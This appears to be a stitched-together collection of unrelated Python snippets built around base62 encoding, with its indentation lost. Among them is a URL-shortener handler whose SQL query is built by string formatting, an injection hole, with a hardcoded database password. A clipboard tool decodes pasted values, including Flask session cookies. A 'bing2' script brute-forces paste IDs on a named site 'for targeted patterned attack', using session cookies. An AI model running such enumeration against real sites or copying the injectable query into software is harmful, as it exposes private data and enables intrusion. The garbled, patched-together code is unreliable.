def generate_code(self):
start_code = BASE62_ALPHABET[1] + BASE62_ALPHABET[0] * (self.CODE_LENGTH - 1)
end_code = BASE62_ALPHABET[-1] * self.CODE_LENGTH
start_integer_code, end_integer_code = [int(base62.decode(edge)) for edge in [start_code, end_code]]
integer_code = randrange(start_integer_code, end_integer_code)
code = base62.encode(integer_code)
return code
def decode_submission_id(submission_id, or_fail=True) -> Optional[int]:
"""Decodes a submission ID into the corresponding seed
# Arguments
submission_id: The base62 submission ID
or_fail: If True, raises a Value error instead of returning None
"""
try:
if not isinstance(submission_id, str):
raise ValueError()
value = int(base62.decode(submission_id))
if 62 ** 5 <= value <= 62 ** 6 - 1:
return value
raise ValueError()
except (ValueError, TypeError):
if or_fail:
raise ValueError(f"'{submission_id}' is not a valid submission ID")
return None
def default(self, *url_parts, **params):
if len(url_parts) > 1:
raise cherrypy.HTTPError(status=400)
id = base62.decode(url_parts[0])
cnx = mysql.connector.connect(host="172.17.0.2",
user="******",
passwd="pass",
db="url_shortner")
cursor = cnx.cursor(dictionary=True)
cursor.execute("SELECT url FROM urls WHERE id='{0}'".format(id))
result = cursor.fetchall()
url = result[0]['url']
proto = ''
# For some reason without the protocal the redirection doesn't work properly.
if 'http' not in url[0:4]:
proto = 'http://'
raise cherrypy.HTTPRedirect(proto + url, 302)
def main():
HOW_TO = """Just copy stuff to clipboard and check console!"""
print(PROGRAM_NAME + " " + "greets you!")
print("How to:")
print(HOW_TO)
recent_value = ""
# print for user
print(PROGRAM_NAME + " is up & running")
print("")
try:
while True:
tmp_value = pyperclip.paste()
if tmp_value != recent_value:
raw = tmp_value #find_between(tmp_value, "MoodleSessionLMS2=", "; path=/")
if (len(raw)):
what_to_log = "[+] Input: " + raw
print(what_to_log)
ret = ""
try:
b02 = ASCII_base.encode(base2.decode(raw))
ret += "base02: " + b02 + "\n"
except Exception:
pass
try:
b16 = ASCII_base.encode(base16.decode(raw))
ret += "base16: " + b16 + "\n"
except Exception:
pass
try:
b36 = ASCII_base.encode(base36.decode(raw))
ret += "base36: " + b36 + "\n"
except Exception:
pass
try:
b56 = ASCII_base.encode(base56.decode(raw))
ret += "base56: " + b56 + "\n"
except Exception:
pass
try:
b58 = ASCII_base.encode(base58.decode(raw))
ret += "base58: " + b58 + "\n"
except Exception:
pass
try:
b62 = ASCII_base.encode(base62.decode(raw))
ret += "base62: " + b62 + "\n"
except Exception:
pass
try:
b64 = ASCII_base.encode(base64.decode(raw))
ret += "base64: " + b64 + "\n"
except Exception:
pass
try:
flask = FSCM.decode(str(raw), None)
ret += "Flask: " + flask + "\n"
except Exception:
pass
what_to_log = ret
print(what_to_log)
else:
what_to_log = "[-] New paste, but no raw detected :("
print(what_to_log)
recent_value = tmp_value
time.sleep(0.1)
except KeyboardInterrupt:
print('cya!')
def main():
PROGRAM_NAME = "bing2"
SLEEP_TIME = 1
HOW_TO = """bing2 - smartened (brute)Bing
Use for targeted patterned attack"""
if len(sys.argv) != 4: #-1
print(HOW_TO)
print("USAGE: python " + PROGRAM_NAME + ".py <URL> <min> <max>")
print("brute_min & brute_max in base62, ie case sensitive")
print("Note: length is picked up from min&max, so pass args correctly")
print("Note: base62 is as follows: numbers->CAPITALS->lowercase")
print("For example: python " + PROGRAM_NAME +
".py http://pastebing.ns.agency/raw/2uKYCmrA 0m Fz")
else:
# init
URL = str(sys.argv[1])
length = max(len(sys.argv[2]), len(sys.argv[3]))
brute_min = int(base62.decode(sys.argv[2]))
brute_max = int(base62.decode(sys.argv[3]))
logname = PROGRAM_NAME + "_" + getUnixTime() + ".log"
log = open(logname, "a+")
cookies = {"zid": "z5214048", "token": "???", "session": "???"}
headers = {"Upgrade-Insecure-Requests": "1"}
work = brute_max - brute_min
bar = ProgressBar(work, max_width=40)
# print for user
print(PROGRAM_NAME + " initialised")
print("URL: " + URL)
print("Note: base62 is as follows: numbers->CAPITALS->lowercase")
print("stdout will be logged to " + logname)
print("the bruteforce will start in 3s")
# allow user to change brute_mind
time.sleep(3)
#payload
i = 0
for i in range(work + 1):
k = i + brute_min
k_string = base62.encode(k) # convertion to the text
k_string = k_string.zfill(length) #decorating
r = requests.get(URL + k_string, cookies=cookies, headers=headers)
txt = r.text
# https://docs.python.org/3/library/zlib.html SAYS
#'An Adler-32 checksum is almost as reliable as a CRC32 but can be computed much more quickly'
#'Changed in version 3.0: Always returns an unsigned value' => GOOD
txt_hash = toHexCustom(zlib.adler32(txt.encode('utf-8')))
# write to payload listings
f_payload = open("pay_" + txt_hash + ".txt", "a+")
f_payload.write(k_string + "\n")
f_payload.close()
# if no transcription => first time resp encountered
if not (os.path.isfile("plain_" + txt_hash + ".txt")):
# write to plaintext transcription
f_plain = open("plain_" + txt_hash + ".txt",
"w+",
encoding="utf-8")
f_plain.write(txt)
f_plain.close()
# now log stuff
whatToLog = "[N]" + k_string + "; New hash found! Check: " + txt_hash + " (" + str(
r.status_code) + ")"
log.write(whatToLog + "\n")
print(whatToLog)
# if hash already encountered
else:
# boring log, what else to do
whatToLog = "[B]" + k_string + ": " + txt_hash + " (" + str(
r.status_code) + ")"
log.write(whatToLog + "\n")
print(whatToLog)
bar.numerator = i
print(str(bar))
#sys.stdout.flush()
#myCoolTitle = PROGRAM_NAME+" "+k_string
#os.system("title "+myCoolTitle) #https://stackoverflow.com/a/10229529
#time.sleep(SLEEP_TIME/1000)
#payload (for-loop) over
whatToLog = "[F] Fin"
log.write(whatToLog + "\n")
print(whatToLog)
log.close()
def decode_to_obj_id(id):
'''
#Decodes the base 62 short URL ID and then encodes it into hexadecimal format as an ObjectID
'''
return ObjectId(base16.encode(base62.decode(id)))
def toBase10(text):
decoded = base62.decode(text)
return decoded